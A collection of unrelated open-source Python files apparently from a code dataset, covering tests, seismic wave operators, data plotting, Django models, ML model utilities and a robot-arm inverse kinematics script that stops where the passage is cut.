if network_device_mac_address:
logging.info('device {} mac address is {}'.format(selected_network_device, network_device_mac_address))
return network_device_mac_address
def main():
pass
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
304832
|
<gh_stars>0
import pytest
from zetemple import zetemple
@pytest.fixture
def item_source():
hosts = [{'name': 'host1', 'prefix': 'PREFIX1:'},
{'name': 'host2', 'prefix': 'PREFIX2:'}]
item_keys = ['zetemple.key1', 'zetemple.comma.KEY2', 'invalid.key']
interval = 180
func = 'ave'
items = [
{'host': 'host1', 'item_key': 'zetemple.key1',
'pv': 'PREFIX1:key1'},
{'host': 'host1', 'item_key': 'zetemple.comma.KEY2',
'pv': 'PREFIX1:KEY2'},
{'host': 'host2', 'item_key': 'zetemple.key1',
'pv': 'PREFIX2:key1'},
{'host': 'host2', 'item_key': 'zetemple.comma.KEY2',
'pv': 'PREFIX2:KEY2'},
]
for item in items:
item['func'] = func
item['interval'] = interval
source = {'hosts': hosts, 'item_keys': item_keys,
'interval': interval, 'func': func,
'items': items}
return source
def test_create_items(item_source):
hosts = item_source['hosts']
item_keys = item_source['item_keys']
interval = item_source['interval']
func = item_source['func']
items = zetemple.create_items(hosts, item_keys, interval, func)
assert items == item_source['items']
@pytest.mark.parametrize('key,pvname', [
('zetemple.key1', 'key1'),
('zetemple.comma.KEY2', 'KEY2'),
('zetemple.comma.pv.KEY.FIELD', 'KEY.FIELD'),
('zetemple.comma.pv', 'pv'),
('ZETEMPLE.comma.pv', 'pv'),
('key1', None)
])
def test_parse_item_key(key, pvname):
_pvname = zetemple.__parse_item_key(key)
assert pvname == _pvname
|
StarcoderdataPython
|
5024647
|
<reponame>jrt54/devito<filename>examples/seismic/elastic/operators.py<gh_stars>1-10
from devito import Eq, Operator, TimeFunction, NODE
from examples.seismic import PointSource, Receiver
def stress_fields(model, save, space_order):
"""
Create the TimeFunction objects for the stress fields in the elastic formulation.
"""
if model.grid.dim == 2:
x, z = model.space_dimensions
stagg_xx = stagg_zz = NODE
stagg_xz = (x, z)
# Create symbols for forward wavefield, source and receivers
txx = TimeFunction(name='txx', grid=model.grid, staggered=stagg_xx, save=save,
time_order=1, space_order=space_order)
tzz = TimeFunction(name='tzz', grid=model.grid, staggered=stagg_zz, save=save,
time_order=1, space_order=space_order)
txz = TimeFunction(name='txz', grid=model.grid, staggered=stagg_xz, save=save,
time_order=1, space_order=space_order)
tyy = txy = tyz = None
elif model.grid.dim == 3:
x, y, z = model.space_dimensions
stagg_xx = stagg_yy = stagg_zz = NODE
stagg_xz = (x, z)
stagg_yz = (y, z)
stagg_xy = (x, y)
# Create symbols for forward wavefield, source and receivers
txx = TimeFunction(name='txx', grid=model.grid, staggered=stagg_xx, save=save,
time_order=1, space_order=space_order)
tzz = TimeFunction(name='tzz', grid=model.grid, staggered=stagg_zz, save=save,
time_order=1, space_order=space_order)
tyy = TimeFunction(name='tyy', grid=model.grid, staggered=stagg_yy, save=save,
time_order=1, space_order=space_order)
txz = TimeFunction(name='txz', grid=model.grid, staggered=stagg_xz, save=save,
time_order=1, space_order=space_order)
txy = TimeFunction(name='txy', grid=model.grid, staggered=stagg_xy, save=save,
time_order=1, space_order=space_order)
tyz = TimeFunction(name='tyz', grid=model.grid, staggered=stagg_yz, save=save,
time_order=1, space_order=space_order)
return txx, tyy, tzz, txy, txz, tyz
def particle_velocity_fields(model, save, space_order):
"""
Create the particle velocity fields
"""
if model.grid.dim == 2:
x, z = model.space_dimensions
stagg_x = x
stagg_z = z
# Create symbols for forward wavefield, source and receivers
vx = TimeFunction(name='vx', grid=model.grid, staggered=stagg_x,
time_order=1, space_order=space_order)
vz = TimeFunction(name='vz', grid=model.grid, staggered=stagg_z,
time_order=1, space_order=space_order)
vy = None
elif model.grid.dim == 3:
x, y, z = model.space_dimensions
stagg_x = x
stagg_y = y
stagg_z = z
# Create symbols for forward wavefield, source and receivers
vx = TimeFunction(name='vx', grid=model.grid, staggered=stagg_x,
time_order=1, space_order=space_order)
vy = TimeFunction(name='vy', grid=model.grid, staggered=stagg_y,
time_order=1, space_order=space_order)
vz = TimeFunction(name='vz', grid=model.grid, staggered=stagg_z,
time_order=1, space_order=space_order)
return vx, vy, vz
def elastic_2d(model, space_order, save, geometry):
"""
2D elastic wave equation FD kernel
"""
vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
s = model.grid.stepping_dim.spacing
cp2 = vp*vp
cs2 = vs*vs
ro = 1/rho
mu = cs2*rho
l = rho*(cp2 - 2*cs2)
# Create symbols for forward wavefield, source and receivers
vx, vy, vz = particle_velocity_fields(model, save, space_order)
txx, tyy, tzz, _, txz, _ = stress_fields(model, save, space_order)
# Stencils
u_vx = Eq(vx.forward, damp * vx - damp * s * ro * (txx.dx + txz.dy))
u_vz = Eq(vz.forward, damp * vz - damp * ro * s * (txz.dx + tzz.dy))
u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vx.forward.dx
- damp * l * s * vz.forward.dy)
u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vz.forward.dy
- damp * l * s * vx.forward.dx)
u_txz = Eq(txz.forward, damp * txz - damp * mu*s * (vx.forward.dy + vz.forward.dx))
src_rec_expr = src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry)
return [u_vx, u_vz, u_txx, u_tzz, u_txz] + src_rec_expr
def elastic_3d(model, space_order, save, geometry):
"""
3D elastic wave equation FD kernel
"""
vp, vs, rho, damp = model.vp, model.vs, model.rho, model.damp
s = model.grid.stepping_dim.spacing
cp2 = vp*vp
cs2 = vs*vs
ro = 1/rho
mu = cs2*rho
l = rho*(cp2 - 2*cs2)
# Create symbols for forward wavefield, source and receivers
vx, vy, vz = particle_velocity_fields(model, save, space_order)
txx, tyy, tzz, txy, txz, tyz = stress_fields(model, save, space_order)
# Stencils
u_vx = Eq(vx.forward, damp * vx - damp * s * ro * (txx.dx + txy.dy + txz.dz))
u_vy = Eq(vy.forward, damp * vy - damp * s * ro * (txy.dx + tyy.dy + tyz.dz))
u_vz = Eq(vz.forward, damp * vz - damp * s * ro * (txz.dx + tyz.dy + tzz.dz))
u_txx = Eq(txx.forward, damp * txx - damp * (l + 2 * mu) * s * vx.forward.dx
- damp * l * s * (vy.forward.dy + vz.forward.dz))
u_tyy = Eq(tyy.forward, damp * tyy - damp * (l + 2 * mu) * s * vy.forward.dy
- damp * l * s * (vx.forward.dx + vz.forward.dz))
u_tzz = Eq(tzz.forward, damp * tzz - damp * (l+2*mu)*s * vz.forward.dz
- damp * l * s * (vx.forward.dx + vy.forward.dy))
u_txz = Eq(txz.forward, damp * txz - damp * mu * s * (vx.forward.dz + vz.forward.dx))
u_txy = Eq(txy.forward, damp * txy - damp * mu * s * (vy.forward.dx + vx.forward.dy))
u_tyz = Eq(tyz.forward, damp * tyz - damp * mu * s * (vy.forward.dz + vz.forward.dy))
src_rec_expr = src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry)
return [u_vx, u_vy, u_vz, u_txx, u_tyy, u_tzz, u_txz, u_txy, u_tyz] + src_rec_expr
def src_rec(vx, vy, vz, txx, tyy, tzz, model, geometry):
"""
Source injection and receiver interpolation
"""
s = model.grid.time_dim.spacing
# Source symbol with input wavelet
src = PointSource(name='src', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nsrc)
rec1 = Receiver(name='rec1', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nrec)
rec2 = Receiver(name='rec2', grid=model.grid, time_range=geometry.time_axis,
npoint=geometry.nrec)
# The source injection term
src_xx = src.inject(field=txx.forward, expr=src * s)
src_zz = src.inject(field=tzz.forward, expr=src * s)
src_expr = src_xx + src_zz
if model.grid.dim == 3:
src_yy = src.inject(field=tyy.forward, expr=src * s)
src_expr += src_yy
# Create interpolation expression for receivers
rec_term1 = rec1.interpolate(expr=tzz)
if model.grid.dim == 2:
rec_expr = vx.dx + vz.dy
else:
rec_expr = vx.dx + vy.dy + vz.dz
rec_term2 = rec2.interpolate(expr=rec_expr)
return src_expr + rec_term1 + rec_term2
def ForwardOperator(model, geometry, space_order=4, save=False, **kwargs):
"""
Construct method for the forward modelling operator in an elastic media.
Parameters
----------
model : Model
Object containing the physical parameters.
geometry : AcquisitionGeometry
Geometry object that contains the source (SparseTimeFunction) and
receivers (SparseTimeFunction) and their position.
space_order : int, optional
Space discretization order.
save : int or Buffer
Saving flag, True saves all time steps, False saves three buffered
indices (last three time steps). Defaults to False.
"""
wave = kernels[model.grid.dim]
pde = wave(model, space_order, geometry.nt if save else None, geometry)
# Substitute spacing terms to reduce flops
return Operator(pde, subs=model.spacing_map,
name='Forward', **kwargs)
kernels = {3: elastic_3d, 2: elastic_2d}
|
StarcoderdataPython
|
8035094
|
import numpy as np
import matplotlib.pyplot as plt
import sys
import sklearn.linear_model
import sklearn.utils.graph
import sklearn.decomposition
DISTANCE = "D1"
SUBTRACT_BIAS = True
THRESHOLD_OUT_OF_MAX = 0.5
distance_file = DISTANCE + ".npy"
try:
D = np.load(distance_file)
except IOError:
print("Distance file not found (%s). Try running compute_distances.py."%(distance_file))
sys.exit(1)
print("Checking if metric is consistent and computing its bias.")
nearest_distances = np.diagonal(D[1:,:-1])
second_nearest_distances = np.diagonal(D[2:,:-2])
sum_of_nearest_distances = nearest_distances[1:] + nearest_distances[:-1]
plt.subplot(221)
plt.scatter(second_nearest_distances, sum_of_nearest_distances, color="b", marker=".", label="data")
#fit a line via RANdom SAmple Consensus
ransac = sklearn.linear_model.RANSACRegressor()
ransac.fit(second_nearest_distances.reshape(-1, 1), sum_of_nearest_distances)
distances_extent = np.array([[0], [np.max(second_nearest_distances)]])
ransac_extent_fit = ransac.predict(distances_extent)
line_slope = (ransac_extent_fit[1]-ransac_extent_fit[0])/(distances_extent[1] - distances_extent[0])
bias = ransac_extent_fit[0]
print("Slope of metric consistensy test is %.2f (should be close to 1)"%(line_slope))
print("Metrix bias estimate is %.2e"%(bias))
plt.plot(distances_extent, ransac_extent_fit, color="k", label="linear fit")
plt.plot(distances_extent, distances_extent, color="r", ls="--", label="slope of 1")
plt.ticklabel_format(style="sci", scilimits=(0,0))
plt.ylim((0,None))
plt.xlabel("D[i,i+2]")
plt.ylabel("D[i,i+1] + D[i+1,i+2]")
plt.legend(loc=2)
if SUBTRACT_BIAS:
print("Substracting bias from all distances.")
debiased_D = (D-bias)*(D>bias)
else:
debiased_D = D
threshold = THRESHOLD_OUT_OF_MAX*np.max(D)
print("Discarding distances above %.2e and running Isomaps"%(threshold))
isomaps_D = debiased_D*(debiased_D<threshold)
geodesic_D = sklearn.utils.graph.graph_shortest_path(isomaps_D)
kernel_pca = sklearn.decomposition.KernelPCA(n_components=2, kernel="precomputed")
isomaps_coordinates = kernel_pca.fit_transform(-0.5*geodesic_D**2)
x = isomaps_coordinates[:,0]
y = isomaps_coordinates[:,1]
plt.subplot(222)
plt.title("Isomaps fit")
plt.plot(x, y, color="k")
print("Mapping Isomaps coordinates to angle")
center_x,center_y,_ = np.linalg.solve([[np.sum(x**2),np.sum(x*y),np.sum(x)], [np.sum(x*y), np.sum(y**2),np.sum(y)], [np.sum(x),np.sum(y),len(x)]], [0.5*np.sum(x*(x**2 + y**2)), 0.5*np.sum(y*(x**2 + y**2)), 0.5*np.sum(x**2 + y**2)])
angles = np.unwrap(np.arctan2(y-center_y, x-center_x))
plt.scatter([center_x], [center_y], marker="x", color="r")
plt.ticklabel_format(style="sci", scilimits=(0,0))
plt.subplot(223)
plt.title("Resulting angles")
plt.plot(np.degrees(angles), color="k")
plt.xlabel("frame number")
plt.ylabel("angle [deg]")
plt.subplot(224)
plt.title("Resulting angle increments")
plt.plot(np.degrees(angles[1:]-angles[:-1]), color="k")
plt.xlabel("frame number")
plt.ylabel("angle [deg]")
plt.tight_layout()
plt.show()
|
StarcoderdataPython
|
183761
|
# -*- coding: utf-8 -*-
"""
@author: <EMAIL>
@site: e-smartdata.org
"""
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('./data/ten_d.csv', index_col=0)
df.columns = ['Open', 'High', 'Low', 'Close', 'Volume']
clean_price = df[['Open', 'High', 'Low', 'Close']]
# %%
corr_matrix = clean_price.corr().round(2)
# %% corr beteen Series
df['Open'].corr(df['Close'])
# %% plot correlation matrix
plt.matshow(clean_price.corr())
# %% using seaborn
sns.heatmap(corr_matrix,
xticklabels=corr_matrix.columns.values,
yticklabels=corr_matrix.columns.values)
|
StarcoderdataPython
|
11220916
|
"""
@author: magician
@date: 2019/12/18
@file: palindrome.py
"""
def is_palindrome(x: int) -> bool:
"""
is_palindrome
:param x:
:return:
"""
return bool(str(x) == str(x)[::-1])
if __name__ == '__main__':
assert is_palindrome(121) is True
|
StarcoderdataPython
|
9770160
|
<reponame>WIM-TRD/Avanza<filename>avanza4java/src/main/java/org/avanza4java/Utils/totp/getTotp.py<gh_stars>0
import argparse
import mintotp
import sys
description = """Script to generate TOTP secret for provided TOTP key """
def createTotpKey(totpKey):
return mintotp.totp(totpKey)
def main(argv):
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--totpkey", "-t", dest="totpKey", type=str, required=True)
args = parser.parse_args()
print(createTotpKey(args.totpKey))
if __name__ == "__main__": main(sys.argv)
|
StarcoderdataPython
|
5053085
|
from django.db import models
# from django.dispatch import receiver
from django.contrib.auth.models import AbstractUser
# from django.conf import settings
# from django.contrib.contenttypes.fields import GenericForeignKey
# from django.contrib.contenttypes.models import ContentType
# from rest_framework.authtoken.models import Token
# This code is triggered whenever a new user has been created and saved to the database
# @receiver(post_save, sender=settings.AUTH_USER_MODEL)
# def create_auth_token(sender, instance=None, created=False, **kwargs):
# if created:
# Token.objects.create(user=instance)
class User(AbstractUser):
'''
User info and profile
'''
# profile_picture = models.ImageField(upload_to='profile')
# location = models.idk(null=True, blank=True)
GENDER_CHOICES = (
('M', 'Male'),
('F', 'Female'),
('O', 'Other'),
)
gender = models.CharField(max_length=10, choices=GENDER_CHOICES, null=True, blank=True)
# lister fields
helpr = models.BooleanField(default=False) # if this use is listing anything or just a user
birthday = models.DateField(null=True, blank=True)
def __str__(self):
return self.username
class Category(models.Model):
'''
All possible categories
'''
CATEGORY_CHOICES = (
('photographer', 'photographer'),
('plumber', 'plumber'),
('landscaper', 'landscaper'),
('personal_trainer', 'personal trainer'),
('tutor', 'tutor'),
('carpenter', 'carpenter'),
('electrician', 'electrician'),
('pool_service', 'pool service'),
('gardener', 'gardnerer'),
('babysitting', 'babysitting'),
)
category = models.CharField(max_length=50, choices=CATEGORY_CHOICES, null=True, blank=True)
def __str__(self):
return self.category
class Listing(models.Model):
'''
Listing a user posts
'''
title = models.CharField(max_length=250)
user = models.ManyToManyField(User)
# profile_picture = models.ImageField(upload_to='profile')
# location = models.idk()
# images
blurb = models.TextField(max_length=500, null=True, blank=True)
# phone_number = models.PositiveIntegerField(null=True, blank=True)
# email = models.CharField(max_length=150)
website = models.CharField(max_length=150, null=True, blank=True)
category = models.ManyToManyField(Category)
# ratings = models.
def __str__(self):
return self.title
|
StarcoderdataPython
|
9767045
|
import collections
import itertools
import logging
from pathlib import Path
import cmws
import numpy as np
import pyro
import scipy
import torch
from cmws.examples.csg.models import (
heartangles,
hearts,
hearts_pyro,
ldif_representation,
ldif_representation_pyro,
neural_boundary,
neural_boundary_pyro,
no_rectangle,
rectangles,
shape_program,
shape_program_pyro,
shape_program_pytorch,
)
# Init, saving, etc
def init(run_args, device):
memory = None
if run_args.model_type == "rectangles":
# Generative model
generative_model = rectangles.GenerativeModel().to(device)
# Guide
guide = rectangles.Guide().to(device)
elif run_args.model_type == "heartangles":
# Generative model
generative_model = heartangles.GenerativeModel().to(device)
# Guide
guide = heartangles.Guide().to(device)
elif run_args.model_type == "hearts":
# Generative model
generative_model = hearts.GenerativeModel().to(device)
# Guide
guide = hearts.Guide().to(device)
elif run_args.model_type == "shape_program":
# Generative model
generative_model = shape_program.GenerativeModel().to(device)
# Guide
guide = shape_program.Guide().to(device)
elif run_args.model_type == "no_rectangle":
# Generative model
generative_model = no_rectangle.GenerativeModel().to(device)
# Guide
guide = no_rectangle.Guide().to(device)
elif run_args.model_type == "ldif_representation":
# Generative model
generative_model = ldif_representation.GenerativeModel().to(device)
# Guide
guide = ldif_representation.Guide().to(device)
elif run_args.model_type == "hearts_pyro":
# Generative model
generative_model = hearts_pyro.GenerativeModel().to(device)
# Guide
guide = hearts_pyro.Guide().to(device)
elif run_args.model_type == "ldif_representation_pyro":
# Generative model
generative_model = ldif_representation_pyro.GenerativeModel().to(device)
# Guide
guide = ldif_representation_pyro.Guide().to(device)
elif run_args.model_type == "neural_boundary":
# Generative model
generative_model = neural_boundary.GenerativeModel().to(device)
# Guide
guide = neural_boundary.Guide().to(device)
elif run_args.model_type == "neural_boundary_pyro":
# Generative model
generative_model = neural_boundary_pyro.GenerativeModel(
num_primitives=run_args.num_primitives, has_shape_scale=run_args.model_has_shape_scale
).to(device)
# Guide
guide = neural_boundary_pyro.Guide(
num_primitives=run_args.num_primitives, has_shape_scale=run_args.model_has_shape_scale
).to(device)
elif run_args.model_type == "shape_program_pyro":
# Generative model
generative_model = shape_program_pyro.GenerativeModel(
num_primitives=run_args.num_primitives
).to(device)
# Guide
guide = shape_program_pyro.Guide(num_primitives=run_args.num_primitives).to(device)
elif run_args.model_type == "shape_program_pytorch":
# Generative model
generative_model = shape_program_pytorch.GenerativeModel(
num_primitives=run_args.num_primitives
).to(device)
# Guide
guide = shape_program_pytorch.Guide(num_primitives=run_args.num_primitives).to(device)
# Memory
if "mws" in run_args.algorithm:
memory = cmws.memory.Memory(10000, run_args.memory_size, generative_model).to(device)
# Model tuple
model = {"generative_model": generative_model, "guide": guide, "memory": memory}
# Optimizer
if run_args.model_type == "rectangles":
parameters = guide.parameters()
else:
parameters = itertools.chain(generative_model.parameters(), guide.parameters())
if "_pyro" in run_args.model_type:
optimizer = pyro.optim.pytorch_optimizers.Adam({"lr": run_args.lr})
else:
optimizer = torch.optim.Adam(parameters, lr=run_args.lr)
# Stats
stats = Stats([], [], [], [])
return model, optimizer, stats
def save_checkpoint(path, model, optimizer, stats, run_args=None):
Path(path).parent.mkdir(parents=True, exist_ok=True)
generative_model, guide, memory = model["generative_model"], model["guide"], model["memory"]
torch.save(
{
"generative_model_state_dict": None
if run_args.model_type == "rectangles"
else generative_model.state_dict(),
"guide_state_dict": guide.state_dict(),
"memory_state_dict": None if memory is None else memory.state_dict(),
"optimizer_state_dict": optimizer.get_state()
if "_pyro" in run_args.model_type
else optimizer.state_dict(),
"stats": stats,
"run_args": run_args,
},
path,
)
logging.info(f"Saved checkpoint to {path}")
def load_checkpoint(path, device):
checkpoint = torch.load(path, map_location=device)
run_args = checkpoint["run_args"]
model, optimizer, stats = init(run_args, device)
generative_model, guide, memory = model["generative_model"], model["guide"], model["memory"]
guide.load_state_dict(checkpoint["guide_state_dict"])
if run_args.model_type != "rectangles":
generative_model.load_state_dict(checkpoint["generative_model_state_dict"])
if memory is not None:
memory.load_state_dict(checkpoint["memory_state_dict"])
model = {"generative_model": generative_model, "guide": guide, "memory": memory}
if "_pyro" in run_args.model_type:
optimizer.set_state(checkpoint["optimizer_state_dict"])
else:
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
stats = checkpoint["stats"]
return model, optimizer, stats, run_args
Stats = collections.namedtuple("Stats", ["losses", "sleep_pretraining_losses", "log_ps", "kls"])
def plot_normal2d(ax, mean, cov, num_points=100, confidence=0.95, **kwargs):
# https://stats.stackexchange.com/questions/64680/how-to-determine-quantiles-isolines-of-a-multivariate-normal-distribution
# plots a `confidence' probability ellipse
const = -2 * np.log(1 - confidence)
eigvals, eigvecs = scipy.linalg.eig(np.linalg.inv(cov))
eigvals = np.real(eigvals)
a = np.sqrt(const / eigvals[0])
b = np.sqrt(const / eigvals[1])
theta = np.linspace(-np.pi, np.pi, num=num_points)
xy = eigvecs @ np.array([np.cos(theta) * a, np.sin(theta) * b]) + np.expand_dims(mean, -1)
ax.plot(xy[0, :], xy[1, :], **kwargs)
return ax
class RectanglePoseDistribution:
def __init__(self, device):
self.device = device
self.lim = torch.tensor(0.8, device=self.device)
def sample(self, sample_shape):
"""
Args
sample_shape
Returns [*sample_shape, 4]
"""
minus_lim = -self.lim
padding = 0.2
min_x = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
max_x = torch.distributions.Uniform(min_x + padding, self.lim).sample()
min_y = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
max_y = torch.distributions.Uniform(min_y + padding, self.lim).sample()
return torch.stack([min_x, min_y, max_x, max_y], dim=-1)
def log_prob(self, xy_lims):
"""
Args
xy_lims [*shape, 4]
Returns [*shape]
"""
# HACK
shape = xy_lims.shape[:-1]
return torch.zeros(shape, device=xy_lims.device)
# min_x, min_y, max_x, max_y = [xy_lims[..., i] for i in range(4)]
# minus_one = -self.one
# min_x_log_prob = torch.distributions.Uniform(minus_one, self.one).log_prob(min_x)
# max_x_log_prob = torch.distributions.Uniform(min_x, self.one).log_prob(max_x)
# min_y_log_prob = torch.distributions.Uniform(minus_one, self.one).log_prob(min_y)
# max_y_log_prob = torch.distributions.Uniform(min_y, self.one).log_prob(max_y)
# return min_x_log_prob + max_x_log_prob + min_y_log_prob + max_y_log_prob
class SquarePoseDistribution:
def __init__(self, random_side, device):
self.random_side = random_side
self.device = device
self.lim = torch.tensor(0.8, device=self.device)
def sample(self, sample_shape):
"""
Args
sample_shape
Returns [*sample_shape, 4]
"""
minus_lim = -self.lim
padding = 1.0
min_x = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
min_y = torch.distributions.Uniform(minus_lim, self.lim - padding).sample(sample_shape)
if self.random_side:
side = torch.distributions.Uniform(
torch.zeros_like(min_x), self.lim - torch.max(min_x, min_y)
).sample()
else:
side = 0.5
max_x = min_x + side
max_y = min_y + side
return torch.stack([min_x, min_y, max_x, max_y], dim=-1)
def log_prob(self, xy_lims):
"""
Args
xy_lims [*shape, 4]
Returns [*shape]
"""
shape = xy_lims.shape[:-1]
return torch.zeros(shape, device=xy_lims.device)
def heart_pose_to_str(heart_pose, fixed_scale=False):
"""
Args
heart_pose
raw_position [2]
raw_scale []
Returns (str)
"""
if fixed_scale:
raw_position = heart_pose
position = raw_position.sigmoid() - 0.5
return f"H(x={position[0].item():.1f},y={position[0].item():.1f})"
else:
raw_position, raw_scale = heart_pose
position = raw_position.sigmoid() - 0.5
scale = raw_scale.sigmoid() * 0.8 + 0.1
return f"H(x={position[0].item():.1f},y={position[0].item():.1f},s={scale.item():.1f})"
def rectangle_pose_to_str(rectangle_pose):
"""
Args
rectangle_pose [4]
Returns (str)
"""
return (
f"R(bl=({rectangle_lim_to_str(rectangle_pose[0].item())},"
f"{rectangle_lim_to_str(rectangle_pose[1].item())}),"
f"tr=({rectangle_lim_to_str(rectangle_pose[2].item())},"
f"{rectangle_lim_to_str(rectangle_pose[3].item())}))"
)
def rectangle_lim_to_str(rectangle_lim):
"""
Args
rectangle_lim (float)
Returns (str)
"""
if rectangle_lim > 1:
return ">1"
elif rectangle_lim < -1:
return "<-1"
else:
return f"{rectangle_lim:.1f}"
def get_gaussian_kernel(dx, dy, kernel_size, scale, device):
"""
Args
dx (float)
dy (float)
kernel_size (int)
scale (float)
device
Returns [kernel_size, kernel_size]
"""
# Inputs to the kernel function
kernel_x_lim = dx * kernel_size / 2
kernel_y_lim = dy * kernel_size / 2
x_range = torch.linspace(-kernel_x_lim, kernel_x_lim, steps=kernel_size, device=device)
y_range = torch.linspace(-kernel_y_lim, kernel_y_lim, steps=kernel_size, device=device)
# [kernel_size, kernel_size]
kernel_x, kernel_y = torch.meshgrid(x_range, y_range)
# [kernel_size, kernel_size, 2]
kernel_xy = torch.stack([kernel_x, kernel_y], dim=-1)
# Kernel function
kernel_dist = torch.distributions.Independent(
torch.distributions.Normal(
torch.zeros((2,), device=device), torch.ones((2,), device=device) * scale
),
reinterpreted_batch_ndims=1,
)
# Output from the kernel function
# [kernel_size, kernel_size]
log_kernel = kernel_dist.log_prob(kernel_xy)
# normalize
log_kernel = log_kernel - torch.logsumexp(log_kernel.view(-1), dim=0)
return log_kernel.exp()
def smooth_image(image, kernel_size, scale):
"""
Args
image [*shape, num_rows, num_cols] (limits -1, 1)
kernel_size (int; must be odd)
scale (float)
Returns [*shape, num_rows, num_cols]
"""
if kernel_size % 2 == 0:
raise ValueError(f"kernel_size must be odd. got {kernel_size}")
# Extract
device = image.device
num_rows, num_cols = image.shape[-2:]
shape = image.shape[:-2]
num_samples = int(torch.tensor(shape).prod().long().item())
image_flattened = image.view(num_samples, num_rows, num_rows)
# Create gaussian kernel
dx, dy = 2 / num_cols, 2 / num_rows
kernel = get_gaussian_kernel(dx, dy, kernel_size, scale, device)
# Run convolution
return torch.nn.functional.conv2d(
image_flattened[:, None], kernel[None, None], padding=kernel_size // 2
).view(*[*shape, num_rows, num_cols])
|
StarcoderdataPython
|
3560522
|
<reponame>AbanobEffat/Pick-and-Place-Udacity
#!/usr/bin/env python
# Copyright (C) 2017 Udacity Inc.
#
# This file is part of Robotic Arm: Pick and Place project for Udacity
# Robotics nano-degree program
#
# All Rights Reserved.
# Author: <NAME>
# import modules
import rospy
import tf
from kuka_arm.srv import *
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from geometry_msgs.msg import Pose
from mpmath import *
from sympy import *
import numpy as np
from numpy import array
from sympy import symbols, cos, sin, pi, sqrt, atan2
#Create symbol table
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8') # theta
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8') # Link Offset
a0, a1, a2, a3, a4, a5, a6 = symbols ('a0:7') # distance between z(i)_axis and z(i-1)_axis
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7') #Angle between Z(i-) and Z(i)
DH_table = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -90.0, a1: 0.35, d2: 0, q2: q2-90.0,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -90.0, a3: -0.054, d4: 1.5,
alpha4: 90.0, a4: 0, d5: 0,
alpha5: -90.0, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7: 0}
ROT_EE = Matrix([[0,0,0],[0,0,0],[0,0,0]])
#Modified DH Transformation matrix Function
def TM_Generator(alpha,a,d,q):
tm = Matrix([[ cos(q), -sin(q), 0, a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), sin(alpha) * cos(q), cos(alpha), cos(alpha) * d],
[ 0, 0, 0, 1]])
return tm
# Create individual transformation matrices
T0_1 = TM_Generator(alpha0, a0, d1, q1).subs(DH_table)
T1_2 = TM_Generator(alpha1, a1, d2, q2).subs(DH_table)
T2_3 = TM_Generator(alpha2, a2, d3, q3).subs(DH_table)
T3_4 = TM_Generator(alpha3, a3, d4, q4).subs(DH_table)
T4_5 = TM_Generator(alpha4, a4, d5, q5).subs(DH_table)
T5_6 = TM_Generator(alpha5, a5, d6, q6).subs(DH_table)
T6_G = TM_Generator(alpha6, a6, d7, q7).subs(DH_table)
T0_G = T0_1 * T1_2 * T2_3 * T3_4 * T4_5 * T5_6 * T6_G
#Fixing gripper rotation in Y axis by 180 and Z axis by 90
r, p , y = symbols('r p y')
x_rot = Matrix([
[ 1, 0, 0],
[ 0, cos(r), -sin(r)],
[ 0, sin(r), cos(r)]]) # ROLL
y_rot = Matrix([
[ cos(p), 0, sin(p)],
[ 0, 1, 0],
[-sin(p), 0, cos(p)]]) # PITCH
z_rot = Matrix([
[cos(y), -sin(y), 0],
[sin(y), cos(y), 0],
[ 0, 0, 1]]) # YAW
Rot_Fixed = z_rot.subs(y, radians(180)) * y_rot.subs(p,radians(-90))
ROT_Error = z_rot * y_rot * x_rot
ROT_EE = ROT_Error * Rot_Fixed
def handle_calculate_IK(req):
rospy.loginfo("Received %s eef-poses from the plan" % len(req.poses))
if len(req.poses) < 1:
print ("No valid poses received")
return -1
else:
global q1, q2, q3, q4, q5, q6, q7
global d1, d2, d3, d4, d5, d6, d7
global a0, a1, a2, a3, a4, a5, a6
global alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6
global DH_table
global ROT_EE
global T0_1, T1_2, T2_3, T3_4, T4_5, T5_6, T6_G, T0_G
# Initialize service response
joint_trajectory_list = []
for x in xrange(0, len(req.poses)):
# IK code starts here
joint_trajectory_point = JointTrajectoryPoint()
# Extract end-effector position and orientation from request
# px,py,pz = end-effector position
# roll, pitch, yaw = end-effector orientation
px = req.poses[x].position.x
py = req.poses[x].position.y
pz = req.poses[x].position.z
(roll, pitch, yaw) = tf.transformations.euler_from_quaternion(
[req.poses[x].orientation.x, req.poses[x].orientation.y,
req.poses[x].orientation.z, req.poses[x].orientation.w])
ROT_EE = ROT_EE.subs({'r': roll, 'p': pitch, 'y': yaw}) # Extract nx, ny, and nz values
EE_Point = Matrix([[px], [py], [pz]])
WC = EE_Point - (0.303) * ROT_EE[:,2] # Getting Wrist center coordinates
side_a = 1.501 #constant
side_bz = WC[2] - 0.75
side_bxy = sqrt(pow(WC[0], 2) + pow(WC[1], 2) ) - 0.35
side_b = sqrt(pow(side_bz, 2) + pow(side_bxy, 2))
side_c = 1.25 #constant
angle_a = acos( ( pow(side_b, 2) + pow(side_c, 2) - pow(side_a, 2)) / (2 * side_b * side_c) )
angle_b = acos( ( pow(side_a, 2) + pow(side_c, 2) - pow(side_b, 2)) / (2 * side_a * side_c) )
angle_c = acos( ( pow(side_a, 2) + pow(side_b, 2) - pow(side_c, 2)) / (2 * side_a * side_b) )
